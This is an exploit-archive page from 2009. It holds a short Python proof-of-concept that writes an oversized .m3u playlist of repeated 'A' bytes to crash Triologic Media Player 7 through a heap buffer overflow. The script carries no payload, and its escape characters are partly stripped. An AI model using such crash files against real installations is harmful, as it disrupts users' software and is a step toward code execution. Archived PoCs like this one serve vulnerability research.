[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC
# Published : 2009-01-12
# Author : zAx
# Previous Title : Nofeel FTP Server 3.6 (CWD) Remote Memory Consumption Exploit
# Next Title : Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits


# IN THE NAME OF ALLAH :)
#!/usr/bin/python
# Discovered By : zAx
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol

print "**************************************************************************"
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoCn"
print " Discovered By : zAxn"
print " ThE-zAx@HoTMaiL.CoMn"
print " In that PoC thanks for : Stack ;) My BrOthEr :)"
print "**************************************************************************"

overflow = "x41" * 3000 # not right, just a PoC

try:
    out_file = open("zAx.m3u",'w')
    out_file.write(overflow)
    out_file.close()
    raw_input("nPoC file created!, Now go to the program and click at Load Buttonn")
except:
    print "Error"
# EoF

# www.Syue.com [2009-01-12]